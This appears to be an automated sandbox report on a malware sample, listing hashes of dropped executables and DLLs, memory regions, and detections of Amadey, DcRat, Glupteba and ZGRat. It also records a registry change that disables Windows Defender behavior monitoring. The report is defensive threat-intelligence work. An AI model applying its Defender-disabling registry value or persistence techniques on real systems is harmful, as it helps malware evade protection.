SHA1 815a68c4975b1987d2642622c0da8f4c589a8376
SHA256 9ecb263008c37bfd66dc954b128b7285f17da1b2c698130112009b2ea3362844
SHA512 a79db25de3c7cdfaa9b4a7ce8330d1a7a1888cb74664dc5117e09c33e220f7cb2f64afbfd006d7c816ee0e7feae5e742a26908a840c2a59983f5d6de7b85cfa5

memory/2820-200-0x0000000000400000-0x0000000000434000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

MD5 5c3d45a9d5c3b707d116fb6d6a16a10a
SHA1 f751598001aabefe3c07c84c159c6af08f7f5922
SHA256 37429fb3aefabc179237643be3400193b33b8aba79f599fc313ff7bea424781a
SHA512 d4b06e679dd87fd7d01aca5f7764192d4e55384edfabbb0004df6f13fb0a26e2158e5d2d682818659ad0807d9ed952ff3c2e3fc03d57684a3d7a684f53905749

memory/1580-223-0x0000000001330000-0x000000000136E000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

MD5 5c3d45a9d5c3b707d116fb6d6a16a10a
SHA1 f751598001aabefe3c07c84c159c6af08f7f5922
SHA256 37429fb3aefabc179237643be3400193b33b8aba79f599fc313ff7bea424781a
SHA512 d4b06e679dd87fd7d01aca5f7764192d4e55384edfabbb0004df6f13fb0a26e2158e5d2d682818659ad0807d9ed952ff3c2e3fc03d57684a3d7a684f53905749

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

MD5 5c3d45a9d5c3b707d116fb6d6a16a10a
SHA1 f751598001aabefe3c07c84c159c6af08f7f5922
SHA256 37429fb3aefabc179237643be3400193b33b8aba79f599fc313ff7bea424781a
SHA512 d4b06e679dd87fd7d01aca5f7764192d4e55384edfabbb0004df6f13fb0a26e2158e5d2d682818659ad0807d9ed952ff3c2e3fc03d57684a3d7a684f53905749

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

MD5 5c3d45a9d5c3b707d116fb6d6a16a10a
SHA1 f751598001aabefe3c07c84c159c6af08f7f5922
SHA256 37429fb3aefabc179237643be3400193b33b8aba79f599fc313ff7bea424781a
SHA512 d4b06e679dd87fd7d01aca5f7764192d4e55384edfabbb0004df6f13fb0a26e2158e5d2d682818659ad0807d9ed952ff3c2e3fc03d57684a3d7a684f53905749

memory/2920-231-0x00000000001D0000-0x0000000000BB4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B5BF.exe

MD5 f99fa1c0d1313b7a5dc32cd58564671d
SHA1 0e3ada17305b7478bb456f5ad5eb73a400a78683
SHA256 8a964d8fb52489ba9086bf0ab5cf8ca7822fe698d03e5e6d5174640f52b8c5ee
SHA512 bbee03761f2ffe4ab99d3e2dd02f49460b1100583ceb0e06f2765eff776d3167880a8dbbb8079c659d39fc3cc8e24dfdd8395ced3eeb6a13ef598ba8b9269a25

C:\Users\Admin\AppData\Local\Temp\B5BF.exe

MD5 f99fa1c0d1313b7a5dc32cd58564671d
SHA1 0e3ada17305b7478bb456f5ad5eb73a400a78683
SHA256 8a964d8fb52489ba9086bf0ab5cf8ca7822fe698d03e5e6d5174640f52b8c5ee
SHA512 bbee03761f2ffe4ab99d3e2dd02f49460b1100583ceb0e06f2765eff776d3167880a8dbbb8079c659d39fc3cc8e24dfdd8395ced3eeb6a13ef598ba8b9269a25

memory/2404-232-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2920-233-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2480-252-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/1804-255-0x0000000000400000-0x0000000000480000-memory.dmp

memory/2480-256-0x0000000074670000-0x0000000074D5E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C682.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\C682.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/1692-286-0x0000000001250000-0x0000000001258000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/528-298-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

memory/2920-304-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2980-306-0x00000000008A4000-0x00000000008B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

memory/528-303-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2980-307-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2512-308-0x0000000002620000-0x0000000002A18000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 18033f40d822613793a87ea37c266bb0
SHA1 c4e9c9f558365f3a2d68ff34830e24650046ee77
SHA256 0dadfa865cf7d0a4588178cce5143953195cff5049f9de32a8e4c9bd82e3ff79
SHA512 7077536a5d51336bca1cd9a996dc0f5c3e516c20d708be2a95266267f7e1c1e365a0720eb858dfff09bb8c934b6844e1cbd3f535292a6da281003fc9ab8ca1ae

C:\Users\Admin\AppData\Local\Temp\DFED.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

C:\Users\Admin\AppData\Local\Temp\DFED.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

memory/1544-328-0x00000000000E0000-0x00000000004C0000-memory.dmp

memory/1208-346-0x0000000002BA0000-0x0000000002BB6000-memory.dmp

memory/528-347-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1692-368-0x000007FEF5E50000-0x000007FEF683C000-memory.dmp

memory/2512-369-0x0000000002620000-0x0000000002A18000-memory.dmp

memory/2512-370-0x0000000002A20000-0x000000000330B000-memory.dmp

memory/1692-371-0x000000001B070000-0x000000001B0F0000-memory.dmp

memory/2512-372-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1544-373-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2404-374-0x0000000004560000-0x00000000045A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

memory/2940-388-0x0000000000220000-0x000000000025E000-memory.dmp

memory/2940-393-0x0000000000400000-0x0000000000461000-memory.dmp

memory/2940-394-0x0000000074670000-0x0000000074D5E000-memory.dmp

\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

memory/112-464-0x000000013FFA0000-0x0000000140541000-memory.dmp

memory/2028-481-0x0000000000280000-0x000000000029E000-memory.dmp

memory/2028-486-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2028-489-0x0000000000310000-0x0000000000350000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7TVQOT0Y\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

memory/1544-523-0x0000000000810000-0x000000000081A000-memory.dmp

memory/1692-524-0x000007FEF5E50000-0x000007FEF683C000-memory.dmp

memory/1692-525-0x000000001B070000-0x000000001B0F0000-memory.dmp

memory/2512-526-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1544-527-0x0000000000820000-0x0000000000828000-memory.dmp

memory/1544-528-0x0000000005030000-0x00000000051C2000-memory.dmp

memory/2512-529-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2940-533-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/1544-534-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-535-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-536-0x0000000000A70000-0x0000000000A80000-memory.dmp

memory/1544-537-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/2028-546-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/2028-547-0x0000000000310000-0x0000000000350000-memory.dmp

memory/1544-548-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-549-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-550-0x0000000005460000-0x0000000005560000-memory.dmp

memory/1544-551-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1544-561-0x0000000004FF0000-0x0000000005030000-memory.dmp

memory/1624-570-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-572-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-574-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-577-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-579-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1624-581-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1624-583-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1544-584-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/1624-595-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3E71.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp3E87.tmp

MD5 bb18dcba6963f64dfb434e83255c7a5e
SHA1 5bf0d53e721eb40ab8172a1134d1657b9d40e4d7
SHA256 d020d662d980b19b1a21f7f6860e8e7958f96d797c939a5fee1d13845c0f3b6b
SHA512 a898203234fbf1b75a5c1fc224b25273a39391563e8048b8dc8b798aff34e6910defbe4f7067afaa7eb764473818489d91adcc2c4a4f4f099e656c9a0640d67d

memory/2512-674-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1688-680-0x000000001B180000-0x000000001B462000-memory.dmp

memory/1688-681-0x000007FEEEAE0000-0x000007FEEF47D000-memory.dmp

memory/1688-682-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1688-683-0x000007FEEEAE0000-0x000007FEEF47D000-memory.dmp

memory/1688-684-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1688-685-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1688-686-0x0000000002410000-0x0000000002418000-memory.dmp

memory/2028-687-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/1624-688-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1688-689-0x00000000026A0000-0x0000000002720000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

memory/1688-695-0x000007FEEEAE0000-0x000007FEEF47D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LMFNFTGD0QX2ZEBHOO3M.temp

MD5 ce5af06dbf124f8054648e95e152478a
SHA1 137d5d340c1c7e57d7243c02a82710c81b6e412b
SHA256 6f42e1094a4aa17930875c23f3779d5dba6d66ad13dcd8ac9ee650dcd779fd53
SHA512 6e84efdf3754a8b4964f0a043efae9125980ba1c126cd2f3fe21c08e73060459de8bc2eaf63383d7aee13723b7325887bb740d0cbed8955a24501707b39f228f

memory/2800-707-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

memory/2800-708-0x000007FEEE140000-0x000007FEEEADD000-memory.dmp

memory/2512-717-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/112-720-0x000000013FFA0000-0x0000000140541000-memory.dmp

memory/2512-721-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2624-722-0x0000000002680000-0x0000000002A78000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2624-732-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2696-744-0x00000000028B0000-0x0000000002CA8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8413e739bdc8a11d0981f0f37d2e1531
SHA1 431352f978017f03ec56812bc38755d3188b747a
SHA256 fcc692bf55a878f17ee1004e50b77e64366f3b0c279773e6e87a836c28fc9e63
SHA512 f0796bb0c07ef88494c53c7b2abe61b17629703ae110c56d723142609c68e3d0cb0ed0319cc71b58fc511903cf326e13b8e67fbd41957d9c11a5815130841e25

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e777fb88946b3b6b64913336f6a64a36
SHA1 1db11c0b8ac11bf6060b59371fb0de260c0db03e
SHA256 0644dcdea3e7bf8d43527d19e104a68beeee21c2a0dc9166bfe3990d5bcfd09c
SHA512 65b26da2ae477319488d56f41d4b704a9da6c92048b48a21c5ad8aefd9c087901f52078868b37af3bec78eb150da0fc47f40238529bab79e2c8a30ff22088143

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8e9d4d2ae23cab6747da9c5e889b17e4
SHA1 807fd3cf95a1db89b7abb6c5ff42b4289f422235
SHA256 d68f6de986936b72d0f2dd99b751886d1f263dca8242615f7e5a648c8abe792c
SHA512 798cca4368a6372867af991b2c57334bf698ca6edc1e374ef4204e87356eb3264c21016d8b13c4bb88ec8f8f9365b4cdb0f7cab98cf28a7f1c19a5f6092a581c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8e9d4d2ae23cab6747da9c5e889b17e4
SHA1 807fd3cf95a1db89b7abb6c5ff42b4289f422235
SHA256 d68f6de986936b72d0f2dd99b751886d1f263dca8242615f7e5a648c8abe792c
SHA512 798cca4368a6372867af991b2c57334bf698ca6edc1e374ef4204e87356eb3264c21016d8b13c4bb88ec8f8f9365b4cdb0f7cab98cf28a7f1c19a5f6092a581c

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7TVQOT0Y\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

memory/2428-933-0x000000013F860000-0x000000013FE01000-memory.dmp

memory/2696-934-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2696-940-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-31 03:11

Reported

2023-10-31 03:14

Platform

win10v2004-20231020-en

Max time kernel

90s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
